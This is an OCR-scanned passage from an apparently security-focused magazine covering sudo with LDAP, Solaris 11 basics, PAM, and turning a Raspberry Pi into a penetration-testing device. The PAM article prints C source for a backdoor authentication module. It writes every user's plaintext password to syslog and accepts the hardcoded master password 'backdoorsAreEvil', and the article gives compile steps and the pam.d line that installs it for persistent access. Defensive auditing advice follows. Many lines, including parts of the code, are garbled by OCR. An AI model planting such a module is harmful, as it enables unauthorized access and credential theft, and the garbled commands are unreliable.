aware operating systems to User Alias and to Host Alias. Unfortunately, it's not possible to use 
command aliases (Cmnd_ Alias). 


The idea is to create a group container inside LDAP to store sudo groups like User Alias. These 
groups will be visible to the whole environment. Sometimes your environment is LDAP aware and 
the next steps could be already done. 


Extend your slapd.conf to include the following schemas: 


include /usr/local/etc/openldap/schema/cosine.schema 


include /usr/local/etc/openldap/schema/inetorgperson.schema 


include /usr/local/etc/openldap/schema/nis.schema 


Create Idif file to group container with the content: 


cn: ou=group, dc=example, dc=com 
objectclass:organizationalunit 


Ou: groupd 


Import to LDAP: 


# ldapadd -x -h localhost -D”cn=admin, dc=example,dc=com” -w secret -f 


Sigil ers: ~ Jelbic 
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Create a ldif file with your group. Take care about the gidNumber, because the gidNumber 
mustn't conflict with local gid numbers: 


dn: cn=Sudooperators, ou=Group, dc=example, dc=com 
objectClass: top 

objectClass: posixGroup 

cn: sudooperators 


Griiclhnbuimlceie: Si0NlG 


Import to Idap: 


# ldapadd -D”cn=admin, dc=example,dc=com” -w”secret” -f 


sudooperators.ldif 


/ 


adding new entry ,cn=Ssudooperators, ou=group, dc=example, dc=com’ 


Configure your /etc/Idap.conf to add NSS group database: 


gusts) [e\s\Sie epeolye) eM naouviy ey eve Sep celica ore Serena 


Configure your /etc/nsswitch.conf to include Idap backend in group database, changing the line 
Starting with group to: 


group compat ldap 


Now, sudo groups inside LDAP are ready to be used inside the sudo register. Use sudoUser in 
the following format: 


sudoUser: *sgroup 


UNIX 


The next step is to prepare a netgroup container. Netgroup is a part of NIS and NIS is an old soft- 
ware used to centralize network information. It is more often recommended to use LDAP instead 
NIS. Create a file named netgroup.Idif with the following content: 


dn: ou=netgroup, dc=example, dc=com 
objectClass: organizationalUnit 


Qe salSielesee bie 


And import to directory: 


# ldapadd -D”cn=admin, dc=example,dc=com” -w”secret” -f netgroup.ldif 


adding new entry ,ou=netgroup, dc=example, dc=com” 


Create a netgroup Idif file with content like Listing 8. Import to LDAP: 


# ldapadd -D”cn=admin, dc=example,dc=com” -w”secret” -f desktops.ldif 


adding new entry ,cn=desktops, ou=netgroup, dc=example, dc=com” 


The nisNetgroupTriple has three fields, host, user and domain. Even though it’s possible to use 
these three fields in sudo directly, it's more recommended to use NSS groups and use only the 
first field of nisNetgroupTriple to store the names of computers. It's necessary to maintain the for- 
mat with parentheses and divided by commas (,,). 


Listing 8. netgroup example ldif file 

dn: cn=desktops, ou=netgroup, dc=example, dc=com 
objectClass: nisNetgroup 

objectClass: top 

cn: desktops 

nisNetgroupTriple: (neves-desktop,,) 


nisNetgroupTriple: (neves-desktop2,,) 
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Clas WIN SCISS KC COjSis SUSI elSieeuioiais) , OUR SUING sias 7 cheep cemmelye; eke Sexo 
objectClass: top 

objectClass: sudoRole 

SHS CESSICCC OS SUC OCS iseicieigs 

sudoCommand: /usr/sbin/userdel 

sudoCommand: /usr/sbin/useradd 

sudoCommand: /usr/sbin/usermod 

sudoHost: +desktops 


sudoUser: ssudooperators 


Configure your /etc/Idap.conf to add NSS netgroup database: 


uss: (OelS Lonaelye, “OU Seine opie) ele Se> celica), Cre icra! 


And configure your /etc/nsswitch.conf to include the ldap backend in the group database by 
changing the line starting with group to: 


group compat ldap 


Finally, it's possible to change sudoHost to the following format: 


sudoHost: snetgroup 


Listing 9 shows a complete sudo register with sudoGroup and sudoHost using LDAP groups and 
netgroups in Idif format. 


Even though it’s possible to use netgroups inside /etc/netgroups and groups inside /etc/groups, 
using LDAP as a back-end is more powerful because of centralized control. | recommend using 
groups and netgroups always and avoiding the use of multiples of sudoUser or sudoHost in the 
sudo register. This way, you will avoid confusion and will have the sudo structure standardized. 


BSD 


Protect sudo registers 


Option noexec 


Inside some Unix commands, it’s possible to run other Unix commands. Examples of this are edi- 
tors vi and vim and the find tool. With vi and vim it’s possible to run commands using :!. Putting vi 
inside sudo is like putting bash or ALL, because one user executes :!bash and has complete con- 
trol of the operating system, running commands with super user powers. 


Another example is the find tool with exec action. Imagine one user with the find tool, using the 
following command: 


# sudo find /etc/ -exec chmod ot+rwx {} \; 


Probably, if you are responsible for this operating system, you would be in trouble. 


sudo has an option to prevent this kind of security problem through noexec. With noexec, if your 
operating system supports LD _PRELOAD, sudo will prevent the execution of another command. 
Running sudo vim, and after that vim command :!bash, for example, will show the following mes- 
Sage error: 


ICBM ESMSctmes Sasi essa l6esla~ 


Even though noexec is effective for many security problems related to sudo, it sometimes is use- 
less. In the above example, we control the possibility of a normal user getting a shell with super 
user power inside vim, but imagine if the same user runs vim by sudo and after that the user 
opens /etc/passwd and change uid for himself to 0. Whether the operating system doesn't have 
LD PRELOAD support or binary is compiled statically, the noexec feature of sudo won't work. For- 
tunately, all modern flavors of Unix have LD_- PRELOAD support. If you control binaries of the op- 
erating system with file integrity software, like triowire, samhain or aide, concerns about binaries 
statically compiled are reduced. | recommend using sudoOption: noexec in cn=defaults. 


Take care about variables 


sudo has some options like env_reset, env_keep and env_check to control which environment 
variables will be available to use by commands called by sudo. Its very important to watch how 
the variables are interpreted by the destination command to avoid some security holes. In gen- 
eral, use env_reset enabled in cn=default. With this, only a few variables will be available in desti- 
nation command. 
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Use valid commands 


Put in sudo only valid commands, in preference with absolute path. If you use sudo registers to a 
command that doesn't exist, if one user gets root access in that moment, he can install his own 
binary in the path appointed by sudoCommanad. After that, this user will get root access by sudo 
every time without your Knowledge. Beyond cares about valid commands in sudoComman4d, it’s 
highly recommended to complement with a file integrity software, like tripwire or aide. 
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UNIX - How To Start Terminal? 


by Nitin Kanojja 


UNIX is a multiuser operating system which ts available in 
many flavours, like Oracle Solaris, HP UNIX, IBM AIX, Free 
BSD, and MacOS. It was developed by Ken Thompson and 
Dennis Ritchie at AT&T Bell Laboratories in the late 1960's. 
In 1978, AT&T’s UNIX seventh edition was split off into Ber- 
keley Software Distribution (BSD). This version of the UNIX 
environment was sent to other programmers around the 
country, who added tools and code to further enhance BSD 
UNIX. 


The most important enhancement made to the OS by the programmers at Berkeley was adding 
networking capability. This enabled the OS to operate in a local area network (LAN). In 1988, 
AT&T UNIX, BSD UNIX, and other UNIX OSs were folded into what became System V release 4 
(SVR4) UNIX. This was a new generation OS, which became an industry standard. The new 
SVR4 UNIX became the basis for not only Sun and AT&T versions of the UNIX environment, but 
also IBM's AIX and Hewlett-Packard’s HP-UX. 


UNIX was constructed with following mechanisms: 
Kernel 


Kernel is the core/heart of an OS and is responsible for all the processing in a computer. It man- 
ages all the physical resources of the computer, including filesystems, CPU, memory, etc. 


Shell 


Shell is a command interpreter and acts as an interface between the system and the user. Shell 
accepts the command and passes it to the kernel, which further executes the command. In Ora- 
cle Solaris 11 and Oracle Enterprise Linux, the default shell is Bourne Again Shell, which is also 


Known as bash. 
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A file system is a logical collection of a files and directories on a partition or a disk. It has a root 
directory, which further contains all files and directories in an operating system. The root directory 
is identified as /. Each file or directory is identified by its name and a unique identifier Known as 
Inode number. 


Figure 1. Directory structure. 
Process 


Every program you run or execute in UNIX/Linux creates a process. When you log in to the sys- 
tem and start the shell, several processes will be started, depending on the associated programs 
in login shell. Whenever you execute a command in the shell, it will start a process, which can fur- 
ther start another process. In that case, the process which has started another process will be 
known as a parent process. You can use the following commands in UNIX/Linux to monitor and 
manage the process: Ps, top, prstat, pgrep. 


solaris and HP UNIX are widely used flavours of UNIX. Since UNIX was developed, many fea- 
tures and tools have been added to different flavours of UNIX, like Journaling file system, ZFS, 
DTrace, enhanced packaging system like IPS, Solaris Volume manager (which was earlier know 
as Solstice Disk Suite). 
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Who should use UNIX/Linux? 


Companies, or system administrators, who have big servers in their environment and need stabil- 
ity, scalability, security and high performance for their servers should use UNIX/Linux operating 
systems. UNIX/Linux operating system uses much less resources in comparison to any other op- 
erating systems. UNIX/Linux has many enhanced security features, like SELinux, IP tables, TCP 
wrappers, ACLs, Dtrace and many more. 


How to start terminal in Oracle Solaris 117? 


To open a terminal window in Oracle Solaris 11, right click on the Desktop and left click onthe 
“Open Terminal” option in the menu. 


= Aoki scoee Feces Syaten 


- 
- 


= | t os . Te Aog 2k 250 0 


aracrre 4" @ 
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Figure 2. Oracle Solaris 11 Desktop Menu. 


An Oracle Solaris 11 Terminal window will then appear with a $ prompt, and you can start enter- 
ing the commands. 
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Figure 3. Terminal window. 


Oracle Solaris 11 Desktop: 
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Figure 4. Oracle Solaris 11 Desktop. 


Installation Options for Oracle Solaris 11 (Flavour of UNIX) 

You have several alternatives for where to install Oracle Solaris 11: 

° Inside a virtual machine on top of your existing operating system 

° On the bare metal (physical machine) as a standalone operating system 


° On the bare metal alongside your existing operating system(s) (multiboot/dual boot sce- 
nario) 
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Installing Oracle Solaris 11 inside a Virtual Machine with Live CD 


The easiest way to start using Oracle Solaris 11 is to install it into a virtual machine on top of the 
host operating system running on the physical machine. The figure below shows Oracle Solaris 
11 installed on Apple OS X using Oracle VM Virtual Box. 


Figure 5. Oracle Solaris on Apple OS X. 


Oracle Solaris 11 will recognize the virtualized devices that the virtual machine provides. If you 
run Oracle Solaris 11 in full-screen mode, you might actually forget that there’s another operating 
system running in the background. The one drawback to this approach is that you need enough 
memory to run two operating systems simultaneously — a minimum of 2 GB is recommended for 
good performance. You should also allow a minimum of 7 GB of disk space to install the operat- 
ing system in virtual machine. 


Oracle VM VirtualBox is a free-to-download virtualization application that can run on Microsoft 
Windows, Apple OS X, Linux, and Oracle Solaris x86 as host platforms, and supports most of the 
flavours of Linux, like Redhat & Oracle Enterprise Linux as guest OS. It also supports Oracle So- 
laris as one of its many guests. 
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Oracle makes it easy to try this approach by offering a number of pre-installed virtual machines 
for Oracle VM VirtualBox as appliances and VM templates that are focused towards a specific 
use, for example, to evaluate the developer tools that are available on Oracle Solaris 11. 


After you have booted off the Live Media, the installation process is straightforward. Simply click 
the Install Oracle Solaris icon on the desktop to launch the graphical installer, shown in Figure 6. 
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Figure 6. The Oracle Solaris 11 Graphical Installer. 


As you can see from the above Figure, the installation process is simple and asks some basic 
questions before installing a fixed set of packages. After Oracle Solaris has successfully been in- 
Stalled, you can easily customize the installation by using the Package Manager. After the installa- 
tion process is complete, you can reboot into your new Oracle Solaris environment or review the 


Oracle Solaris installation log, as shown in Figure 7. 
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Figure 7. Reviewing the Installation Log. 


Now you are ready to launch your work. 
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What is PAM and Why Do | Care? 


by Jerry Craft 


Pluggable Authentication Modules (PAM) is the main mecha- 
nism for Linux, as well as other Unix systems, that performs 
the authentication of the user every time they log in. PAM 
can be configured in a number of ways in order to authenti- 
cate the user in a variety of means, such as using pass- 
words, SSH keys, smart cards, etc. 


ae = i Se = —  —- = — = — ~ ——_—— SSS = SS — : — 
Se eee = a Se eee ae eee Se —_ — = = 


What will you learn? 

° What Pluggable Authentication Modules are 
° How PAM can be used 

What should you know? 


° Basic knowledge of Linux 
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PAM can be used to authenticate users not only when logging on to the system from the tradi- 
tional logon screen, but also through services such as FIP, HTTP, SAMBA and other services 
can use the PAM. If an attacker is able to modify the integrity of the PAM system, then they are 
given the ability to modify the method for PAM to authenticate users which is a perfect situation 
for creating a backdoor that will be used to establish a path with which they can access systems 
again. This article will detail how a simple PAM module can be created that could be placed on a 
system to allow an attacker to access a system in the future. This would be useful if an attacker 
has already gained root access to a system and wants to ensure that they are able to access it 
again if their original path in is corrected. This article will also be useful for anyone in charge of de- 
fending systems as it will give the reader an understanding of what to monitor on their systems to 
detect compromise as well as help in investigations. 
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Introduction to the PAM configuration file: 


All Linux distributions have a different method of configuring the PAM configuration as the PAM 
configuration is fairly versatile in the way rules can be written. This section will detail information 
specifically as it relates to Red Hat Enterprise Linux 6, as well as Centos 6, to give the reader an 
understanding of the configuration which can be modified to any Linux OS that utilizes PAM. The 
configuration for PAM is in the /etc/pam.d directory. There are a number of files in the directory to 
deal with various services that use PAM, such as SSHD, the Gnome login, SU and a bunch of 
other key services. If you go into the sshd file, you will notice that the second line after the com- 
ment includes auth include password-auth. Looking at almost all the other files that deal with net- 
work services in the /etc/pam.d directory reveals that almost every service has this line in it. What 
this does is create a single file password-auth to update to affect the rules of all services that in- 
clude this line. This prevents the administrator from having to edit every single file if they want to 
change these policies. The system-auth is used for logging in for the console as well as utilizing 
the su command. The password-auth and system-auth files are two files that are generally all that 
need to be edited in order to change the PAM policies unless the change only needs to be spe- 
cific to a service. The configuration follows a pattern of: 


The password-auth file is broken into four groups: auth, account, password and session. Each of 
those groups then calls a module which can provide a number of functions. The different groups 
are displayed in Figure 1. 
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Auth provides the main identification and authentication of the user. Generally 
this is through passwords, but can be other mechanisms, such as smart cards. 
auth Pam_unix.so (this module is used in all of the groups) provides the main 
authentication piece that verifies the username and password of the user when 
they log in. 


Account provides a number of services to verify if the account follows a 
account number of rules. This can be used to lock out accounts after a certain number 
of tries, ensures that the user is in certain groups, etc. 


This group is used when the user sets their password. This is primarily used to 
check for the password complexity when the user sets their password. 
Pam_cracklib.so can be set up to ensure a minimum number of characters are 
used, require lower case, uppercase and symbols, etc. Pam_unix.so here can 
allow you to change the type of encryption that is used (sha512 is now the 
default in Red Hat 6). 


Responsible for setting up and tearing down a service. Is used by services in 
session different ways. One specific thing it does is mount user’s home directory and a 
lot of other functions that this article isn't too concerned with. 


password 


Figure 1. Groups available in PAM configurati. 


Each of the modules is appended with, so they can be shared. Some of these shared objects can 
take arguments that change their function and how they operate. 


All the rules are read from top to bottom in a particular group. After each module is run, a value is 
returned of pass or fail, the control flag is evaluated to see whether to allow it to continue or not. 
The control flag can be required, requisite, optional or sufficient as explained by Figure 2. 


lf this module doesn't succeed, the entire group will fail, which means the user 
Required won't be able to login or change their password. PAM will immediately stop 
evaluating further in the stack. 


Very similar to required in that if this module doesn't succeed, the entire group 
Requisite will again fail, the only difference is that PAM will continue running through 
each of the modules. When it reaches the end, though, it will still fail. 


Optional The module will be run, but what It returns is irrelevant. 


If this module succeeds, immediately allow the entire group to pass and PAM 


Sufficient | | , | 
will no longer continue evaluating following modules. 


Figure 2. Available control flags in PAM configuration files. 
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As has been explained, there are a number of modules that are available with a number of argu- 
ments that can be passed in to customize each module. Documentation is stored in 
/usr/share/doc/pam-1.1.1/ (replace the version number with another if you have a different Linux 
distribution) that contains each of the individual modules in depth. 


A quick note about Red Hat/Centos is that there is an authconfig program that when run, over- 
writes all customized configurations. In order to prevent this from happening, simply disable the 
use of the authconfig program with the command: 


Creating your own PAM module for nefarious purposes: 


Creating a PAM module is generally done in C. This should only be done on non-production sys- 
tems (obviously) as if a mistake is made, it may prevent the user from logging into the system 
again (or let anyone logon). Writing modules is fairly simple and usually just involves creating a 
module with one or more custom functions. A module can be used in one or more of the groups 
such as auth, session, account and/or password as discussed above, in order to perform different 
functions depending on which group the module is being used in. The pattern for each of the func- 
tions is as follows: 


Function is to be replaced with one of the following with their matching group displayed in Figure 


Function Group 


authenticate Auth Table 3. Available functions for PAM 


setcred Auth 
acct_mgmt Account 
chauthtok Password 
open_ session | Session 


close_session | Session 
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hese functions can either return PAM SUCCESS when the module is successful, or another 
value in the case of errors (Such as the user password was incorrect). Depending on what is re- 
turned, the rules defined in the PAM configuration files decide how this return code will be used. 
For example, if the rule is optional, then the return code doesnt really matter. If the rule is defined 
as required, then PAM SUCCESS must be returned, otherwise PAM no longer continues to evalu- 
ate the rules. 


For the purposes of making something nefarious, the authenticate function is the most useful and 
this will be used for the rest of the article. 


#include <pwd.h> 
#include <stdlib.h> Figure 4. PAM_prime.c code containing a back- 


#include <stdio.h> door of backdoorsAreEvil. 
#include <string.h> 
#include <unistd.h> 
#include <syslog.h> 


#include <security/pam modules .h> 


PAM EXTERN int 
pam sm authenticate(pam handle t *pamh, int flags, 


{ 


int argc, const char *argv[]) 


struct pam conv *conv; 
struct passwd *pwd; 
const char *user; 

char *password; 

int pam err; 


/* identify user */ 

if ((pam err = pam get user(pamh, Suser, NULL)) != PAM SUCCESS) 
return (pam err); 

if ((pwd = getpwnam(user)) == NULL) 
return (PAM USER UNKNOWN) ; 


/* get password */ 
pam err = pam get item(pamh, PAM CONV, (const void **)&conv); 
if (pam err != PAM SUCCESS) 
return (PAM SYSTEM ERR); 
pam err = pam get authtok(pamh, PAM AUTHTOK, 
{const char **)&password, NULL); 


/* compare passwords */ 
char* output = (char*) malloc(sizeot(pwd->pw name) + (strlen(password) * 
sizeof(char)) + 26*sizeof(char)); 
snprintf(output, 106, “USER: %s, Password: %s", pwd->pw name, password); 
Syslog(LOG ERR, output); 
if(!strnemp(password, “backdoorsAreEvil",25)) { 
SySlog(LOG ERR, “Backdoor activated"); 
return PAM SUCCESS; 


} 
return (PAM AUTH ERR); 
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The code listed in Figure 1 contains the pam _sm_authenticate function so it will be used when 
the user logs in. The password is checked to see if the user typed in backdoorsAreEvil and if so, 
PAM SUCCESS is returned. This function also writes Backdoor activated into /var/log/messages 
which may not be desirable if this is truly being used for malicious intent. Note that this module 
doesnt have to authenticate valid users or do anything else that would be expected of an authen- 
tication system. Just because the module returns PAM AUTH ERR doesn't mean the user can't 
login unless the rule in the configuration file is set to required. If the rule is set to either sufficient 
or optional, then PAM will continue evaluating the rules in the configuration file. 


yum install pam-devel 


In order to compile this, you must first install pam-devel. For Red Hat, simply run the command: 


To compile and install the package, run the following commands (replace lib64 with lib on 32 bit 
systems). 


[neferonwCiCetaheers! (Dats) <sles |i Wefele Sigleil@ =ie joys jenankil= Ae 


[root@Centos Desktop]# ld -x --shared -o pam prime.so pam prime.o 


PSCC eCSinieos WSs acolo 2 ico joc jor se / dale Ss Sowuen ic 7/ 


Finally, add the following line to the beginning of the auth group in /etc/pam.d/password-auth and 
/etc/pam.d/system-auth: 


BAPAM-1.6 

* This file is auto-generated 

® User chanmoes will be destroved the next time authconfia is run. 
auth sufficient pam prige.so 

4uth required pam env.so 

auth sufficient pam unix.so mallet try first pass 

auth requisite pam succeed if.so uid >= 566 quiet 
auth required pas deny.so 


auth SHE ING ISIC. [Oui Jose sLindier, Eve 


This line simply says that if the pam_prime module returns PAM SUCCESS, that is enough and 
do not continue evaluating the rest of the PAM modules. This means that with this installed at- 
tacker can log on with just a valid user name and the password backdoorsAreE vil. 
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This could be highly useful as a method of maintaining access after compromising a system. No 
extra ports are opened so long as SSH or another service utilizing PAM is available and an at- 
tacker can simply login with the same password through normal services. 


Defense of PAM module backdoors 


The first defense of a PAM module backdoor is simply preventing the attacker from gaining root 
access in the first place. Without root, it is impossible to place the necessary module or modify 
the PAM configuration file. Of course this isn't always possible, so the next best defense is to 
monitor file changes on a system. If anything involving the PAM system changes, administrators 
should investigate the change, looking into why and how the change occurred. Simply auditing all 
of the files in /etc/pam.d will go a long way, so long as the logs are looked at and preferably sent 
to a system log server. 


To audit the files password-auth-ac and system-auth-ac, simply add this to /etc/audit/audit.rules 
and ensure auditd is set to run. 


Tools that periodically verify the hash sums of files can also be helpful. Ensure that configuration 
files, as well as programs, are verified for integrity. RPM provides a convenient method of verify- 
ing files in an RPM package. This is convenient, as when files are updated, the hashes are also 


automatically updated when the package is properly updated (packages are signed by the vendor 
and therefore are considered trusted). Simply run the command rpm -qVa in order to collect infor- 
mation on files including file hashes, permissions and more. Simply keeping a running copy of 
this file and then periodically checking it with a known good working copy can prove very useful. 
2 ee 

http://docs.fedoraproject.org/en-US/Fedora_Draft_Documentation/0.1/html/RPM_ Guide/ch04s04. 
html for more details. 


Conclusions 


PAM should be understood by any security professional who must work with Linux. This knowl- 
edge is invaluable for people trying to defend systems as well as people looking to exploit sys- 
tems. For more information, reading the information included in the /usr/share/doc/pam-* directory 
is a good start. For more in depth reading, Packt Publishing has an excellent cheap eBook called 
Pluggable Authentication Modules: The Definitive Guide to PAM for Linux SysAdmins and C De- 


velopers by Kenneth Geisshirt. 
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Raspberry PI! 


How About Some Raspberry P1 


by Jerry Craft 


In early 2006, Eben Upton was working with undergraduate 
admissions in computer science as a PhD Candidate for the 
University of Cambridge. Working in admissions, he was 
hoping to find kids who were used to playing around with 
computers, but instead discovered something different. The 
love for figuring out how a computer functioned wasn’t part 
of the college application. Eben discovered kids were no 
longer writing programs and taking apart circuit boards. In- 
stead, they were playing video games or using the family 
computers to update MySpace/Facebook posts. Kids didn’t 
have access to a computer they could blow up or really get 
into and discover how a computer functions. The hacking in- 
stinct was gone. Instead, kids going into college for com- 
puter science were “..consumers of computers.” (Mann) 


Eben decided that, in order to change this, 
there needed to be a simple low cost alterna- 
tive for kids to use and discover a different 
side of computing, the side of computers that 
Eben, and anyone prior to 1995, grew up dis- 
covering. Eben wanted to help kids learn 
about programming, circuitry, and the basics 
they had been missing in the applications he 
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was reviewing. Eben decided to build a cheap 
single board computer called Raspberry Pi to 
facilitate that discovery. During his growing 
up, he discovered how to take apart comput- 
ers, build programs, and discover how the sys- 
tems work from machine language to basic 
electronics (Figure 1). 
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Raspberry PI 


computers from that point forward and every 
waking moment was spent hunched over a 
computer figuring out how it worked and how | 
could use it to do what | needed. 


Cx commodore 


Wick) 


Figure 1. Eben Upton. 


| too had a similar experience growing up. | 
personally came to computers in the 80's 
when | was 16. My first computer was a Com- Figure 2. Commodore VIC 20 
modore VIC 20. It had no hard drive because 
at that time they were too expensive. Like- 


wise, it had no floppy drive, tape drive, and it That type of drive to learn computers is what 
would only boot to ROM BASIC. My family Eben felt was missing in today’s students and 


was too ead to buy the computer so | spent a it drove Eben to build the Raspberry Pi. Eben 
year working to save up enough money to buy wanted to see kids have a simple low cost 
this $100 system. But | did it, and when | — Computer they could build, use, and break. In 
brought it home my mother wondered what | 2009, he put together the Raspberry Pi Foun- 
was doing. | quickly connected the RCA video gation, a charity built to promote the study of 
connector to my black and white TV and = computer science in schools. The one goal of 


booted it up for the first time. | watched every- the Raspberry Pi Foundation is to help give 
thing go and for the next few months | would the spirit of the hobbyist back to kids so they 


sit in front of that computer and learn BASIC can create a computer from the ground up 
programming. Likewise, as time would go on | and discover the world that both Eben and | 
would tear that small computer apart and dis- gig covered as kids. 


cover a world of chips, circuit boards, and 
amazing technology. That large purchase 
would lead me to get a job at a hobby shop re- 
pairing circuit boards and building RC cars for 
customers. My whole life was surrounded by 
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Remember the joy of opening up new com- 
puter equipment or discovering how to use a 


new OS? What about the first time you suc- ae 


cessfully compiled your program to do some 
great thing and it actually compiled without er- 
rors? Today, | am a Security Consultant and | 
get the opportunity to work in an environment 
where my hobbyist tendencies allow me to 
take neat tools like this and build something to 
make my life easier. | too have taken the 
Raspberry Pi and used it to create a small de- 
vice | use in my own security engagements. In 
my Penetration Testing reports, | call it “The 
Raspberry Pi Test’. The whole goal of this test 
is to see how my customer's enterprise will re- 
act to a small computer placed on their net- 
work. It's a fear all Blue Team security engi- 
neers dread and something all Red Team 
penetration testers should use in their bag of 
tricks. 


It is in that spirit that | bring you this tutorial. | 
spent a few weeks perfecting my installations, 
as | am sure you will as well. But here is the 
basic tutorial regarding how to construct a 
Raspberry Pi into a penetration testing tool. 


Purchasing your Raspberry Pi 


In order to start this endeavor you will need to 
purchase a Raspberry Pi. The recommended 
site to purchase the Raspberry Pi is 
http://www.farnell.com/pi/. Choose your coun- 
try, or if you are from the United States you 
can go to http:/www.newark.com/. The coun- 
try you choose will set the language, shipping 
and the currency option for you. Be aware 
that the site you choose will setup some de- 
fault values and set you up for success (Fig- 
ure 3). 


RASIHE UY 
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Figure 3. Newark Website 


Assembled or Unassembled 


There are many options when choosing your 
Raspberry Pi. You can choose to get an unas- 
sembled board or an assembled board. My 
soldering skills have not stood the test of time 
and in so doing, | was not confident that | 
wanted to rely on my ability to solder the first 
time out of the gate. So, | purchased an as- 
sembled board. But if you are one of those 
people where you feel confident in your ability 
to solder then feel free to order an unassem- 
bled board. | have since done so and | can 
say the experience was great. The smell of 
the solder is something that sticks with you for- 
ever. 


Raspberry Pi Model A or Model B 


The next choice to make is what model to pur- 
chase. There are two different models called 
Model A or Model B. Most will want to pur- 
chase the Model B version because you will 


want the latest and greatest. 
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But some on a budget may want the Model A 
for some sort of pet project. Model A is nor- 
mally a $25 (US) investment; Model B is a 
$35 (US) investment. The specification differ- 
ences are listed below: 


RASPBERRY PI MODEL B 


Specifications (Figure 4) 


SoC: Broadcom BCM2835 Multimedia Proces- 
sor, comprised of: 


CPU: Single-Core ARM1176JZ-F (ARMv6 
ISA) at 700 MHz 


GPU: Broadcom Dual-Core VideoCore IV Me- 


dia Co-Processor 


Figure 4. Raspberry Pi Model B 
RAM: 256MB (Model A & B) 


USB: 2x USB 2.0 
Shopping List 
Video: 1x HDMI, 1x RCA Analogue Video 
Of course you are going to select and pur- 


Audio: 1x HDMI, 1x 3.5mm Analogue Jack chase your Pi but, you will need a few acces- 
sories as well. Use this list to identify those 
Storage: SD Card madi y 


Networking: None (Model A) or 10/100 Ether- 
net (Model B) 


Additional Connectivity: GPIO, UART, 1I2C, 
SPI, CSI, DSI, JTAG 


Actual Size: 85.6mm x 53.98mm 


Costs: Model A = $25.00 : Model B = $35.00 
USD 


Figure 5. Class 10 and Class 4 SD Cards 
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Hard Drive } 


You will need to purchase a Hard Drive for 
your new Pi. Notice on the basic schematic 
there is no hard drive listed. The hard drive in 
the unit is the SD card so if you have one 
around for another project you can use it. But 
here is a note about the cards, it is recom- 
mended you get a card that is minimally a 
Class 4. | have had problems with cards un- 
der a Class 4 card. One problem | would expe- 
rience is that even though | would shut down 
the Linux operating system correctly, the card 
would still have errors on it and a few times | 
lost the entire partition. So stick with experi- 
ence and use a Class 4 or better. | am cur- 


Charging Cable 


rently running a Class 10 Lexar card with Of course, your iPhone cable is not a micro- 
16GB of space. This is a great card and it has USB power supply but, | had one of those for 
been rock solid (Figure 5). another accessory. So if you do not have a 

micro-USB supply you should get one from 
Power Supply Element 14 (Figure 7). 


You will need a power supply. No giant black 
brick will be shipped with your Raspberry Pi, 
you will need to purchase one or you will need 
to “find” one. If you are a technologist like me, 
you have a few power supplies lying around 
for the different gadgets you use. You can buy 
a power supply from Element 14 or you can 
use any power supply that is 5V at 7/00mA. 
Many mobile phone chargers fit these criteria. 
| personally use my iPhone charger shown be- 
low. It makes the entire penetration testing 
platform nice and compact (Figure 6). 
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Video 


lf you want to SEE your Raspberry Pi boot up 
you will need to plug it into an HDMI compati- 
ble resource like a TV or into a RCA video 
jack. | used my home TV for my testing. 
Again, | had spare RCA cable from an old TV 
project that helped me out. You may need to 
purchase an HDMI or RCA cable. 


Raspberry Pi Case 


Yes, you can purchase a case to go with your 
Raspberry Pi. You can make it pretty or you 
can make it stealth either way the cases can 
be found on the site, so make sure you get 
one that fits you. It is also a good investment 
because you never know where you will be 
placing your Pi. So, a case is a good invest- 
ment to protect your new toy, which cost any- 
where from $7 and up (Figure 8). 


Figure 8. Raspberry Pi Case 
Raspberry Pi Bundles 


Now, if all of this is scary and you just want to 
click and buy a bundle, feel free to do so. New- 
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ark and others have Raspberry Pi bundles 
you can buy that take all the guess work out 
of it. In fact, they have bundles that are the 
complete kit including a mouse and keyboard. 
Because this is PenTest Magazine, | felt we 
would not use a keyboard and mouse. After 
all, we are all experienced testers who under- 
stand SSH and how to remotely connect to a 
Linux system. But if you want to get a com- 
plete kit to build your Raspberry Pi those are 
available as well. 


Kits come at a cost, however. The graphic be- 
low will show you that a complete kit costs al- 
most $85 US, whereas | spent $35 for my Pi 
and $7 for my case. The other items | had ly- 
ing around the house being unused. 


Pi + Advasced Bund 
ere, +" Vow 4rA* £.. 


: oF, at SS se 8 A 


$84.99 


(e- Motel A Basa Bunce 
becca, Vee 4 “MAG: rt 
DP sss» 


Figure 9. Two Kits for Raspberry Pit 


- a 


Shopping Conclusion 


So with those parts you are done shopping! 
simply purchase and ship your new toy and 
feel free to unbox it with the joy you use to 
have during Christmas or Birthdays. 
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Unboxing your Raspberry Pi 


Your Raspberry Pi will come in an antistatic 
bag with all your other goodies. As you will 
see, it's only a single board computer with no 
moving parts (Figure 10). 


Raspberry Pi Tour 


It's often hard to understand scale when you 
read articles. However, the Raspberry Pi is 
very small. | am including screenshots for 
readers to see and get an idea as to how tall 
and small the Raspberry Pi is when it arrives. 
As a contrast, | am using my iPhone and 
iPhone power supply as scale references. The 
iPhone used for these pictures is an iPhone 
4S (Figure 11-16). 


162 


MAGAZINE 


163 


Walk Through Conclusion 


Overall, the Raspberry Pi is a very small sin- 
gle board computer with more power than 
most of us had when we were kids. Next we 
will format our SD card and create a hard 
drive for our Raspberry Pi. Then we will load 
some cool tools onto the card and setup our 
pentesting Raspberry Pi. 


lf we plug our Raspberry Pi into its video re- 
source and power it on, all you will get is a red 
light on the power. | plugged mine into RCA 
and power and there is no CMOS boot screen 
or any indication that something is happening 
outside of the red light. | wanted to show this 
to you because this is the only interface you 
have if something goes wrong with your Rasp- 
berry Pi or SD Card hard drive. If your parti- 
tions are damaged, or you are not giving 
enough power to the Pi, you will want to re- 
view these lights for an indication of what has 
gone wrong (Figure 17). 


Many sites document the lights on the main 
board and they also document the causes of 
each problem. | have used 


http://elinux.org/R-Pi Hub as a troubleshoot- 
ing resource and it has worked well. 
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Setting up the Hard Drive 


= ) « ProgramData » Micreseft » Windows » Start Menu » Programs » SOFormatter 


Fie Eda View Toot Help 


Organae © 


The Raspberry Pi Foundation has 


Include 


out together a great tutorial on how Fonte 
Detktop 
to setup an SD Hard Drive for the ik bownisss 


Raspberry Pi. | will be following the 

guide at http:/Wwww.raspberrypi.org using a 
Windows OS in this demonstration. Obviously, 
if you run Linux it is easy to natively fdisk and 
format an SD card. The same can be said for 
MacOSX for that matter. However, if you want 
to use Windows, you want to use an SD for- 
matter. | have had problems using the normal 
format feature for a hard drive in Windows. 
Sometimes it just does not recognize the ca- 
pacity of the entire SD Card. The Raspberry 
Pi Foundation mentions using this tool as well 


https://www.sdcard.org/downloads/formatter 
4/eula_ windowsy/. 


Once you accept the EULA, a zip file will be 
sent to your system. Simply unzip and install 
the SETUP.EXE file and run the install. | ran 
the exe and clicked Next, Next, Next, Finish 
